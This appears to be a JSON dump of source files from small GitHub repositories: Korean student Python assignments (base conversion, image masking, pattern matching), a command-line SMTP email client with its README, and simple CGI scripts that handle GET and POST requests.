changePrice(theInventory)\n elif choice == '5':\n changeQty(theInventory)\n elif choice == '6':\n totalQty(theInventory)\n elif choice == '7':\n calculateTotalAmount(theInventory)\n elif choice == '8':\n print('Thank you for using this program')\n break\n else :\n print('invalid choice') \n \n return\n\nmain()" }, { "alpha_fraction": 0.5663430690765381, "alphanum_fraction": 0.647249162197113, "avg_line_length": 21.925926208496094, "blob_id": "fcf75bc114273a3946d6f1631a9554abf6d23823", "content_id": "e7aab239d4fabab7748dabd9beec21c970e23a11", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 778, "license_type": "no_license", "max_line_length": 78, "num_lines": 27, "path": "/assignment3/assignment3.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 10 14:46:34 2019\n\n@author: cw020\n\"\"\"\n\n# 과제 3\n\nfrom skimage import io\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nphoto_data = io.imread('sd-3layers.jpg') # 이미지 읽기\nphoto_data.shape # 이미지 크기 확인\nradius = 3725 / 2 # 반지름 변수\nx, y = np.mgrid[0:3725, 0:4797] # 좌표 계산을 위해 만듦\ncircle = ((radius - x)**2 + (4797/2 - y)**2)**0.5 > radius # 반지름 보다 거리가 멀면 원 밖\n\nphoto_data[circle] = 255 # 원 밖 전부 흰색으로 만들기\n\nplt.imshow(photo_data)\n\nblack_white = np.logical_and(circle, x >= 1862 ) # 원 밖이면서 x 절반 아래\nphoto_data[black_white] = 0 # 원 밖이면서 절반 아래를 검정색으로\n\nplt.imshow(photo_data) # 이미지 출력" }, { "alpha_fraction": 0.4342442452907562, "alphanum_fraction": 0.4449188709259033, "avg_line_length": 24.467391967773438, "blob_id": "4316fd180c34bfb8b32330f2ec4a9065093086a5", "content_id": "1a5a47296be755a8387ac6c40d6c6cd7a1b8097a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2990, "license_type": "no_license", "max_line_length": 123, "num_lines": 92, "path": "/assignment1/assignment1.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\n# 정수 입력받는 함수\ndef inputNum():\n \n # stop이나 정수를 받을 때까지 반복\n while True:\n num = input('Enter an unsigned integer: ')\n \n # stop을 입력받으면 stop을 리턴해줌\n if(num == 'stop'):\n print('\\nThank you for using this program')\n return 'stop'\n \n # 입력받은 것이 숫자인지 확인\n elif(num.isdigit() == True):\n \n # 숫자가 양의 정수이면 그 수를 리턴\n num = float(num)\n \n if (num % 1 == 0 and num > 0):\n return int(num)\n \n# 변환할 진수를 입력받는 함수\ndef choice():\n \n # 올바른 진수 명령어를 입력받을 때까지 반복\n while True:\n choice = input('b or B for binary, o or O for octal, h or H for hexadecimal: ')\n \n # 2진수\n if(choice == 'b' or choice == 'B'):\n return 2\n # 8진수\n elif(choice == 'o' or choice == 'O'):\n return 8\n # 16진수\n elif(choice == 'h' or choice == 'H'):\n return 16\n # 올바르지 않은 명령어 입력시\n else:\n print('Invalid choice!')\n \n# 진수 변환을 계산해주는 함수\ndef calculate(num, cmd): # num은 진수로 나누어줄 수, cmd는 변환할 진수\n \n numList = [] # 나눈 나머지들이 순서대로 들어가는 리스트\n insList = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F'] # 진수 변환 코드를 줄이기 위해 꺼내쓰기용 리스트\n res = '' # 리스트를 문자열로 병합\n \n # num이 변환할 진수보다 작을 때까지 반복 \n while True: \n \n # num이 변활할 진수보다 작으면 리스트 마지막에 넣고 반복문 종료\n if num < cmd:\n numList.append(num)\n break\n \n # num을 cmd로 나눈 나머지를 리스트에 넣어주고, 그 몫을 num의 값으로 변경\n else:\n numList.append(num % cmd)\n num = num//cmd\n \n # 리스트를 하나의 문자열로 병합\n for i in numList:\n \n res += insList[i]\n \n # 문자열을 뒤집어서 최종 값 출력\n print(res[::-1] + '\\n:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::\\n')\n \n return\n \n\ndef main():\n \n print('\\n\\nThis program will convert a base 10 number into another base\\n')\n \n # stop을 입력받을 때까지 반복\n while True:\n num = inputNum() # 정수나 'stop'을 입력받음\n if(num == 'stop'): # stop을 입력받으면 프로그램 종료\n return\n cmd = choice() # 변환할 진수를 입력받음\n calculate(num, cmd) # 진수 변환 계산하고, 결과 값 출력\n \nmain()" }, { "alpha_fraction": 0.3179347813129425, "alphanum_fraction": 0.37228259444236755, "avg_line_length": 12.666666984558105, "blob_id": "39012923982f1cca9660d1cea01faac7cef24257", "content_id": "21b383502ca02e27ea007a9d116ece4506b59147", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 368, "license_type": "no_license", "max_line_length": 40, "num_lines": 27, "path": "/test4.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 21 19:19:18 2019\n\n@author: cw020\n\"\"\"\n\ndef main():\n \n n_list = []\n n = int(input())\n i = 0\n \n while i < n:\n \n tmp = input()\n \n n_list.append(tmp[0:len(tmp)-3])\n \n i += 1\n \n for n in sorted(n_list):\n \n print(n)\n \n\nmain()" }, { "alpha_fraction": 0.36612021923065186, "alphanum_fraction": 0.41530054807662964, "avg_line_length": 16.1875, "blob_id": "c2a74bceb2a64c0b41278c1b51d5deb99ebc3421", "content_id": "d9151171a0b896f5b38898ca8ab519f864e03f97", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 549, "license_type": "no_license", "max_line_length": 42, "num_lines": 32, "path": "/test.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Nov 21 11:15:00 2019\n\n@author: cw020\n\"\"\"\n\n\ndef main():\n \n n1, n2, n3 = map(int, input().split())\n i = 0\n n = n1 + n2 + n3\n n_dic = {}\n n_list = []\n while i < n:\n num = input()\n if num in n_dic:\n n_dic[num] += 1\n else:\n n_dic[num] = 1\n i += 1\n for i in n_dic.keys():\n if n_dic[i] > 1:\n n_list.append(i)\n n_list.sort()\n print()\n print(len(n_list))\n for i in n_list: \n print(int(i))\n \nmain()" }, { "alpha_fraction": 0.4490644633769989, "alphanum_fraction": 0.47054746747016907, "avg_line_length": 24.785715103149414, "blob_id": "3104831d8379b154372430e81e6ce093fa05e82e", "content_id": "1d8a5979ab1c4d5133e278e6d075855d12ac2724", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2095, "license_type": "no_license", "max_line_length": 78, "num_lines": 56, "path": "/algorithm/algorithm.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 14 16:37:08 2019\n\n@author: cw020\n\"\"\"\n\ndef match(P, S, n, m):\n \n cnt = 0 # 파이썬에 do while문이 없어서 cnt로 첫 실행은 무조건 되게 설정\n l = -1 # 현재 검사 중인 문자의 패턴 시작 위치 (S기준)\n r = 0 # 현재 검사 중인 문자의 l로부터의 위치\n matched = False\n \n # 패턴을 찾거나, 패턴의 시작 위치가 문자열의 길이 - 패턴의 길이와 같아지면 반복문 종료 (돌려봤자 어차피 길이가 안되기 때문) \n while ((l < n - m) and matched == False) or cnt == 0 :\n l = l + 1\n r = 0\n matched = True\n cnt = cnt + 1\n \n # 패턴이 맞지 않거나, 패턴을 찾으면 반복문 종료\n while ((r < m) and matched) or cnt == 1 :\n \n matched = P[r] == S[l + r] # 문자열의 매칭 여부 확인\n r = r + 1\n cnt = cnt + 1\n \n # 마지막에 매칭한 위치인 r과 패턴의 길이가 같고, 마지막 매칭이 True이면 패턴 존재\n if r == m and matched == True :\n print('\\nstring의 ' + str(l+1) + '번째부터 입력하신 pattern이 존재합니다.')\n return\n \n # 만약 아니면\n else :\n print('\\n문자열 안에 입력하신 문자열이 존재하지않습니다.')\n return\n \ndef main():\n \n S = input('문자열(S)을 입력하시오: ')\n P = input('문자열(S) 안에서 찾고싶은 패턴(P)을 입력하시오: ')\n \n # 패턴의 길이는 1보다 크거나 같아야하고, 문자열보다 작거나 같아야함\n if 1 <= len(P) <= len(S):\n match(P, S, len(S), len(P))\n \n # 패턴의 길이나 문자열의 길이를 입력 안했을 때\n elif len(P) == 0 or len(S) == 0:\n print('\\n값을 모두 입력해주세요.')\n \n # 패턴의 길이가 문자열의 길이보다 클 때\n elif len(P) > len(S):\n print('\\n문자열(S)의 길이보다 찾고싶은 패턴(P)의 길이가 더 큽니다.')\n \nmain()" }, { "alpha_fraction": 0.3479999899864197, "alphanum_fraction": 0.41999998688697815, "avg_line_length": 10.409090995788574, "blob_id": "a4f24d51cb26e8124f45f4e8769828b0f25e00c0", "content_id": "e371eff6360ff21bf794a8e95c7a8b32985dbb4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 42, "num_lines": 22, "path": "/알마.py", "repo_name": "cw02048/python-numpy-pandas", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 22 13:36:59 2019\n\n@author: cw020\n\"\"\"\n\ndef main():\n \n a = 2\n b = 1\n n = int(input())\n \n h = list(map(int, input().split(' ')))\n \n print(h)\n return\n \n \n \n \nmain()" } ]
8
luftj/Manno
https://github.com/luftj/Manno
239d493827be0ee9b197c63c64ec8c117ab9414b
98921af12f204801bdb48ccf45ec518100820045
09605913dca3c9982adf03adc50d3c14984c6e78
refs/heads/master
2022-12-08T22:54:01.404480
2020-09-10T19:55:05
2020-09-10T19:55:05
294,499,245
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6371681690216064, "alphanum_fraction": 0.643386721611023, "avg_line_length": 33.56198501586914, "blob_id": "99628f80f459bc826777087097cd73ec1b449ea9", "content_id": "7872c04e8daf1689ee393e29a9473218f238ee2d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4181, "license_type": "no_license", "max_line_length": 139, "num_lines": 121, "path": "/main.py", "repo_name": "luftj/Manno", "src_encoding": "UTF-8", "text": "import argparse\nimport tkinter\nimport json\nfrom PIL import Image, ImageTk, ImageDraw\n\n\nstep = -1\ntruth_text_list = []\n\nimg_buffer_percent = 50\noutpath = \"annotated_result.json\"\nkey_ocr_text = \"NameBeforeDictionary\"\nkey_annotation_result = \"truth\"\n\ndef finish_cb(e):\n finish()\n\ndef finish():\n main_win.destroy()\n\n # save annotated json to disk\n if len(truth_text_list) != len(json_data[\"features\"]):\n print(\"Warning! text list wrong size!\", len(truth_text_list), len(json_data[\"features\"]))\n # raise Exception(\"text list wrong size!\",len(truth_text_list),len(json_data[\"features\"]))\n\n for idx, entry in enumerate(truth_text_list):\n json_data[\"features\"][idx][\"properties\"][key_annotation_result] = entry\n\n print(\"Saving to disk at %s ...\" % outpath)\n with open(outpath,\"w\",encoding=\"utf-8\") as file:\n json.dump(json_data,file)\n\ndef label_step_cb(e):\n label_step()\n\ndef label_step():\n global step\n step += 1\n\n if step >= len(json_data[\"features\"]):\n print(\"no more features, exiting\")\n finish()\n\n if step > 0:\n # store user entered ground truth value\n truth_text = entry_truth.get()\n truth_text_list.append(truth_text)\n\n # load text detection bbox from json\n coords = json_data[\"features\"][step][\"geometry\"][\"coordinates\"][0]\n x_coords = [p[0] for p in coords]\n y_coords = [-p[1] for p in coords]\n w_buf = (max(x_coords) - min(x_coords)) / 100 * img_buffer_percent\n h_buf = (max(y_coords) - min(y_coords)) / 100 * img_buffer_percent\n\n # define cutout window from detection bbox\n l,t,r,b = min(x_coords) - w_buf, min(y_coords) - h_buf, max(x_coords) + w_buf, max(y_coords) + h_buf\n detail_img = map_img.crop((l,t,r,b))\n\n # draw bbox rect\n draw = ImageDraw.Draw(detail_img)\n draw.rectangle(((w_buf,h_buf), (max(x_coords) - min(x_coords) + w_buf, max(y_coords) - min(y_coords) + h_buf)), outline=\"red\", width=2)\n\n # update image label\n photo = ImageTk.PhotoImage(detail_img)\n label_img[\"image\"] = photo\n label_img.configure(image=photo)\n label_img.image = photo\n\n # update detection label\n ocr_text = json_data[\"features\"][step][\"properties\"][key_ocr_text]\n label_detection[\"text\"] = \"Detection: \" + ocr_text # show OCR result\n entry_truth.delete(0, tkinter.END) # clear input field\n if key_annotation_result in json_data[\"features\"][step][\"properties\"]:\n entry_truth.insert(0, json_data[\"features\"][step][\"properties\"][key_annotation_result]) # insert existing annotation\n entry_truth.focus_set()\n\n label_progress[\"text\"] = \"%d/%d\" % (step, len(json_data[\"features\"]))\n\n print(step,ocr_text,(l,t,r,b))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"json\",help=\"filepath to json of text detection\")\n parser.add_argument(\"image\",help=\"filepath to corresponding map image\")\n parser.add_argument(\"--inplace\",help=\"set to change truth annotations inplace in input json\",action=\"store_true\")\n args = parser.parse_args()\n\n if args.inplace:\n outpath = args.json\n\n # load json detections\n with open(args.json,encoding=\"utf-8\") as file:\n json_data = json.load(file)\n if len(json_data[\"features\"]) == 0:\n print(\"no features! exiting...\")\n exit()\n\n # load map image\n map_img = Image.open(args.image) \n\n main_win = tkinter.Tk()\n main_win.title(\"Manno -- Annotating: %s\" % args.image)\n main_win.iconphoto(False, tkinter.PhotoImage(file='images/icon.png'))\n \n label_img = tkinter.Label(main_win)\n label_img.pack()\n label_detection = tkinter.Label(main_win, text=\"Detection\")\n label_detection.pack()\n entry_truth = tkinter.Entry(main_win)\n entry_truth.pack()\n b1 = tkinter.Button(main_win, text=\"Next [RETURN]\", command=label_step)\n b1.pack()\n b2 = tkinter.Button(main_win, text=\"Save & Quit [ESCAPE]\", command=finish)\n b2.pack()\n label_progress = tkinter.Label(main_win,text=\"0/0\")\n label_progress.pack()\n main_win.bind(\"<Return>\", label_step_cb)\n main_win.bind(\"<Escape>\", finish_cb)\n label_step() # start with first image immediately\n main_win.mainloop()" }, { "alpha_fraction": 0.7376543283462524, "alphanum_fraction": 0.7422839403152466, "avg_line_length": 31.399999618530273, "blob_id": "795004cfc337485e6f37732f2ee9e97eaa8b4260", "content_id": "d3704a31944fd284ddd605eebcbe8701f9c7c9e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 648, "license_type": "no_license", "max_line_length": 201, "num_lines": 20, "path": "/README.md", "repo_name": "luftj/Manno", "src_encoding": "UTF-8", "text": "# Manno, the map annotator\n\nthis tool is for quickly annotating ground-truth labels for OCR on maps. \n\n---\n\n![preview image of ui](images/preview.JPG)\n\n## Installation\n\nRequires\n* Python3\n\n```$ python3 -m pip install -r requirements.txt ```\n\n## Usage\n\nSet the desired buffer, output path and json keys in main.py\nThen run `$ python3 main.py [-h] [--inplace] json image ` with the path to your geojson file with text detections bounding boxes (see sample in `test_data`) and the path to the corresponding map image.\nSetting `--inplace` leads to no separate output file being generated, instead, the annotations will be added to the input json file.\n" } ]
2
lbraglia/pymzn
https://github.com/lbraglia/pymzn
18d3520c0876b7fa438d3fe9bcc50b0357120f86
9a9254e962631813c57df2620866291b0fef7e45
47ef31f47afbcdf3800d12c8d673a52e4af2866a
refs/heads/master
2015-09-25T12:38:41.919770
2015-09-16T07:46:43
2015-09-16T07:46:43
40,364,474
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5483871102333069, "alphanum_fraction": 0.5582047700881958, "avg_line_length": 32.9523811340332, "blob_id": "dbac36a457e3a282112a7726f172858ef3f86ee9", "content_id": "552d6a450189428c2ecb213ce3365e3afa514c1b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 713, "license_type": "no_license", "max_line_length": 87, "num_lines": 21, "path": "/setup.py", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "from distutils.core import setup\nsetup(name = 'pymzn',\n packages = ['pymzn'],\n version = '0.1',\n author = 'Luca Braglia',\n author_email = '[email protected]',\n url = 'https://github.com/lbraglia/pymzn',\n license = 'GPLv3+',\n description = 'Monitor a list of products available in Amazon in\\\n search of good offers (world-wide)',\n entry_points={'console_scripts': [\n 'pymzn = pymzn.scripts:pymzn'\n ]},\n classifiers = [\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)',\n 'Development Status :: 3 - Alpha',\n \n ]\n)\n" }, { "alpha_fraction": 0.7495429515838623, "alphanum_fraction": 0.7495429515838623, "avg_line_length": 33.1875, "blob_id": "1ccd46db72d7eec0621ef670389791bed4073bae", "content_id": "094b15e24679ed51e71dd7df36c29352f8e06b14", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 547, "license_type": "no_license", "max_line_length": 76, "num_lines": 16, "path": "/README.md", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "# pymzn\n\n`pymzn` should be a Python package (providing a script) to monitor a list\nof products (the local `~/.pymzn_list` file) on a set of configurable Amazon\nsites (eg USA, UK, IT), in order to retrieve prices/conditions for new/used\ngoods, order by price and show what of interests you can buy for a few\nbucks.\n\nSome features:\n\n- should be as simple as possible\n- no auth/login required: anonymous requests and web scraping\n- probably to be used with a scheduler (cron/anacron?)\n- send alert (mail? else?)\n\nOr at least this is the big picture.\n" }, { "alpha_fraction": 0.6758620738983154, "alphanum_fraction": 0.6758620738983154, "avg_line_length": 23.16666603088379, "blob_id": "33da47f6028f6bec5a439fe93f9d28e1bbd16bf7", "content_id": "f8a94da2f0a45f23c3b6076eeef3fa78657a8c44", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "no_license", "max_line_length": 37, "num_lines": 6, "path": "/pymzn/defaults.py", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "from os.path import expanduser\n\nrc_file = expanduser('~/.pymznrc.py')\npl_file = expanduser('~/.pymznpl')\nsites = ['usa', 'uk']\nbenchmark = sites\n" }, { "alpha_fraction": 0.6116504669189453, "alphanum_fraction": 0.6213592290878296, "avg_line_length": 29.899999618530273, "blob_id": "9ced5355e9d5f075e8c32fcb903d1be4d1093c6e", "content_id": "c19d32f2006cc8172fb9cf8c5d7ad88719280808", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 309, "license_type": "no_license", "max_line_length": 63, "num_lines": 10, "path": "/pymzn/helpers.py", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "import random\nimport time\n\ndef randsleep(min = 1, max = 1, quiet = True):\n 'Function to sleep the process for random.randint seconds.'\n secs = random.randint(min, max)\n if not quiet:\n print(\"Going to sleep for\", secs, \\\n secs > 1 and \"seconds.\" or \"second.\")\n time.sleep(secs)\n" }, { "alpha_fraction": 0.5670050978660583, "alphanum_fraction": 0.5700507760047913, "avg_line_length": 29.78125, "blob_id": "1a839897c5b6443bee347d927d599fcba3d10cba", "content_id": "7582d888b7994646fdf48c445e3f7bf268bc82b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1970, "license_type": "no_license", "max_line_length": 77, "num_lines": 64, "path": "/pymzn/scripts.py", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "'''Command line scripts for the package'''\n\nimport argparse\nfrom . import defaults as df\n\ndef config(desc, cli, rc, prg_defaults):\n '''Chose between alternate config parameters: command line ones overwrite\n rc specified, rc specified overwrite program defaults.'''\n\n if cli is not None:\n rval = cli\n elif rc is not None:\n rval = rc\n elif prg_defaults is not None:\n rval = prg_defaults\n else:\n msg = 'No available values for %s' % (desc)\n raise Exception(msg)\n \n return rval\n\ndef add_missing_None(rc):\n ''' Add missing none to RC data structure in order to go on safely'''\n param_list = ['pl_file', 'sites', 'benchmark']\n for param in param_list:\n if param not in rc:\n rc[param] = None\n return rc\n \ndef pymzn():\n # Argument parsing\n parser = argparse.ArgumentParser()\n opts = (\n # ----------------------------\n # (param, help, default, type)\n # ----------------------------\n ('--rc', 'config files', df.rc_file, str),\n ('--pl', 'products list files to use', df.pl_file, str),\n ('--sites', 'Amazon sites (comma separated)', df.sites, str),\n ('--benchmark', 'Benchmark site', df.benchmark, str)\n )\n for i in opts:\n help_string = '{0} (default: {1})'.format(i[1], i[2])\n parser.add_argument(i[0], help = help_string, type = i[3])\n args = parser.parse_args()\n\n # RC config parsing\n rc_file = args.rc if args.rc is not None else df.rc_file\n loc = glob = {}\n exec(open(rc_file).read(), glob, loc)\n rc = add_missing_None(loc)\n \n # Config setup: command line > rc > program defaults\n pl_file = config('pl_file', args.pl, rc['pl_file'], df.pl_file)\n sites = config('sites', None, rc['sites'], df.sites)\n benchmark = config('benchmark', None, rc['benchmark'], df.benchmark)\n\n # Read product_list\n\n # Scrape data\n\n # Convert currencies\n\n # Send reports\n" }, { "alpha_fraction": 0.6447368264198303, "alphanum_fraction": 0.6578947305679321, "avg_line_length": 36.5, "blob_id": "811cba82a69ddc421a3b6611404555fb3984430e", "content_id": "e120cb92d07b051aad5485bedcbba70ff55ffb62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Makefile", "length_bytes": 76, "license_type": "no_license", "max_line_length": 65, "num_lines": 2, "path": "/Makefile", "repo_name": "lbraglia/pymzn", "src_encoding": "UTF-8", "text": "install:\n\tcd .. && pip3 install --upgrade --force-reinstall --user ./pymzn\n\n" } ]
6
utkarshdubey/Python---Email-Client-CLI
https://github.com/utkarshdubey/Python---Email-Client-CLI
8a4ffeab781fedfef24cb215e9d9653a37d49ed4
0198e36f43ae7fe07b4d0866e3bfefeca177ec0b
83a5cb516895cc8619895f7fef90da4b65bad771
refs/heads/master
2020-03-26T16:48:07.039020
2018-08-18T05:35:16
2018-08-18T05:35:16
145,123,598
0
0
null
2018-08-17T13:26:29
2018-08-18T05:36:26
2020-02-15T16:51:10
Python
[ { "alpha_fraction": 0.7312802076339722, "alphanum_fraction": 0.7451691031455994, "avg_line_length": 27.55172348022461, "blob_id": "bb1cbf3e4cedf18184fbdae1aafd0eae010445da", "content_id": "6d98a2460ec591d9aefed20d3a51a8334dcd7e04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1656, "license_type": "no_license", "max_line_length": 155, "num_lines": 58, "path": "/README.md", "repo_name": "utkarshdubey/Python---Email-Client-CLI", "src_encoding": "UTF-8", "text": "# Email Client CLI\n\n### Overview\nEmail Client CLI, is a CLI client for sending emails to desired addresses without opening the browser everytime. It requires some packages.\n### Demo\n\nStep 1:\nWe open the CLI envrionment. \n\n\n![alt text](screenshots/rsz_scr_1.png \"Step 1\")\n\nStep 2:\nWe configure the email information. \n\n\n![alt text](screenshots/rsz_scr_2.png \"Step 1\")\n\nStep 3:\nWe enter the details and create a sample email message with html and send an email to our desired address. \n\n\n![alt text](screenshots/rsz_scr_3.png \"Step 1\")\n\nStep 4:\nWe see that the email arrives in the mailbox. \n\n\n![alt text](screenshots/rsz_scr_4.png \"Step 1\")\n\nStep 5:\nWe can now see the whole formatted email. \n\n\n![alt text](screenshots/rsz_scr_5.png \"Step 1\")\n\n### Requirements\n- Python Version 3.4 or above\n- Pip Version 9.0 or above\n- Package Termcolor. ``pip3 install termcolor --user``\n- A cup of coffee near you.\n\n### Installation\nYou should have MIME and SMTP libraries pre-installed which are default in Python version 3.4 and above.\nYou should also have Termcolor package installed which you can do with the following command.\n``pip3 install termcolor --user``\n\n- After that just download this package and extract the zip file.\n- After extracting the package, run the main.py file with the following command.\n``python main.py ``\n- Sip your coffee now.\n\n### Contributions\nHey if you are interested in contributing in this open-source project. Please open a pull request or an issue to improve the current state of this project.\n\nIf you have better versions of this project, then contact me and we can get the ball rolling.\n\n[Visit my website](http://utkarsh.co)\n" }, { "alpha_fraction": 0.5518824458122253, "alphanum_fraction": 0.5580042600631714, "avg_line_length": 28.432432174682617, "blob_id": "fd1a578974f25d7c23885b36e1963ef809670e10", "content_id": "4b9c4f10e341bfe2a1fa407b64e6fdc5a4b8820a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3267, "license_type": "no_license", "max_line_length": 106, "num_lines": 111, "path": "/main.py", "repo_name": "utkarshdubey/Python---Email-Client-CLI", "src_encoding": "UTF-8", "text": "import sys, csv, getpass, signal\nfrom random import randint\nfrom smtplib import SMTP, SMTPAuthenticationError, SMTPException\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom os import system, name\nfrom termcolor import colored, cprint\n\n# GLOBAL VARIABLES\nfile_name = 'data_mail.csv'\n\n# functions\n\ndef clear():\n if name == 'nt':\n _ = system('cls')\n else:\n _ = system('clear')\n\n# Other stuff\n\nprint(\"\"\"\n Welcome to CLI Email Client.\n Here is a list of common hosts and their information.\n\"\"\")\nprint(colored(\"\"\"\n Gmail:\n Host => \"smtp.gmail.com\"\n Port => 587\"\"\", \"yellow\"))\nprint(colored(\"\"\"\nNOTE: Please don't forget to allow less secure apps from the Google Panel,\nor else this CLI Client will not work.\n\"\"\", \"red\"))\n\nwhile True:\n print(\"\"\"\n 1) Enter 1 to configure your email client.\n 2) Enter 2 to send an email.\n\n 3) Enter 0 to exit.\n \"\"\")\n inp = input(\"Please enter an option: \")\n if int(inp) == 1:\n host_name = (input(\"Please enter the host url: \"))\n port_name = input(\"Please enter the port: \")\n user_name = input(\"Please enter your email address: \")\n user_pass = getpass.getpass(\"Please enter your password: \")\n user_data = [[\"host\", \"port\", \"email\", \"password\"], [host_name, port_name, user_name, user_pass]]\n data_file_name = open(file_name, 'w')\n with data_file_name:\n writer = csv.writer(data_file_name)\n writer.writerows(user_data)\n clear()\n\n if int(inp) == 2:\n\n # Reading the CSV file\n with open(file_name) as csv_file:\n csv_reader = csv.reader(csv_file)\n count = 0\n for row in csv_reader:\n if count == 0:\n count += 1\n else:\n host_name = row[0]\n port_name = row[1]\n user_name = row[2]\n user_pass = row[3]\n count += 1\n\n # More information\n\n host = host_name\n port = port_name\n username = user_name\n password = user_pass\n to_mail = input(\"Please enter the receivers email address: \")\n\n # EMAIL INFORMATION\n msg = MIMEMultipart(\"alternative\")\n subject = input(\"Please enter the subject of the email: \")\n from_name = input(\"Please enter the from name: \")\n to_name = input(\"Please enter the to name: \")\n msg['Subject'] = subject\n msg['From'] = from_name\n msg['To'] = to_name\n\n msg_info = input(\"Please enter the message(HTML Supported): \\n\")\n part = MIMEText(msg_info, 'html')\n\n\n msg.attach(part)\n\n # EMAIL SENDING PART\n try:\n email_conn = SMTP(host, port)\n email_conn.ehlo()\n email_conn.starttls()\n try:\n email_conn.login(username, password)\n except SMTPAuthenticationError:\n print(colored(\"The credentials are wrong.\", \"blue\"))\n email_conn.sendmail(from_name, to_mail, msg.as_string())\n email_conn.quit()\n except SMTPException:\n print(\"Sorry an error occured.\")\n\n clear()\n\n if int(inp) == 0:\n sys.exit()\n" } ]
2
heizi1307/request_method
https://github.com/heizi1307/request_method
12c6f204d6b9dcf4fef81255611457526103ee45
74bcabbf07870070e3c4c00925329d734e790c0f
1ae9af53e578238acdf05526ccc5b471d7d41fc8
refs/heads/main
2023-08-28T13:52:35.694647
2021-10-03T05:32:43
2021-10-03T05:32:43
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5290948152542114, "alphanum_fraction": 0.5571120977401733, "avg_line_length": 25.514286041259766, "blob_id": "c270b85e9c86cd87c40a6df4a011b21dd986e3e4", "content_id": "15e5c7cb0d856d48dde26046cc6faeb7a177b6d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 928, "license_type": "no_license", "max_line_length": 66, "num_lines": 35, "path": "/request_method_get.py", "repo_name": "heizi1307/request_method", "src_encoding": "UTF-8", "text": "#! /usr/bin/python3\nimport cgi\nimport os\nform = cgi.FieldStorage()\ntext1 = \"\"\ntext2 = \"\"\nif os.environ[\"REQUEST_METHOD\"] == \"GET\":\n if \"asdf\" in form:\n asdf = form[\"asdf\"].value\n for i in range(20):\n text1+=asdf\n else:\n text1 = \"Status: 400 Bad Request\"\n text2 = \"The variables 'asdf' and 'jkl' are both required\"\n if \"jkl\" in form:\n jkl = form[\"jkl\"].value\n for i in range(20):\n text2+=jkl\n else:\n text1 = \"Status: 400 Bad Request\"\n text2 = \"The variables 'asdf' and 'jkl' are both required\"\nelse:\n text1 = \"Status: 405 Method Not Allowed\"\n text2 = \"Allow: GET\"\nprint (\"Content-type:text/html\\r\\n\\r\\n\")\nprint ('<html>')\nprint ('<head>')\nprint ('<title>request method get</title>')\nprint ('</head>')\nprint ('<body>')\nprint ('<p>%s</p>' % text1)\nprint ('<br>')\nprint ('<p>%s</p>' % text2)\nprint ('</body>')\nprint ('</html>')\n" }, { "alpha_fraction": 0.4501262605190277, "alphanum_fraction": 0.4722222089767456, "avg_line_length": 25.847457885742188, "blob_id": "7083dc9652b71fd63f51303b24de0833d9a7a400", "content_id": "f5fa426dbd0d0aeabc1d1a3fab48faf346155bf4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1584, "license_type": "no_license", "max_line_length": 67, "num_lines": 59, "path": "/request_method_post.py", "repo_name": "heizi1307/request_method", "src_encoding": "UTF-8", "text": "#! /usr/bin/python3\nimport cgi\nimport os\ntext1 = \"\"\ntext2 = \"\"\ntable = \"\"\nflag = 0\nform = cgi.FieldStorage()\nif os.environ[\"REQUEST_METHOD\"] == \"POST\":\n if \"text\" in form:\n text = form[\"text\"].value\n 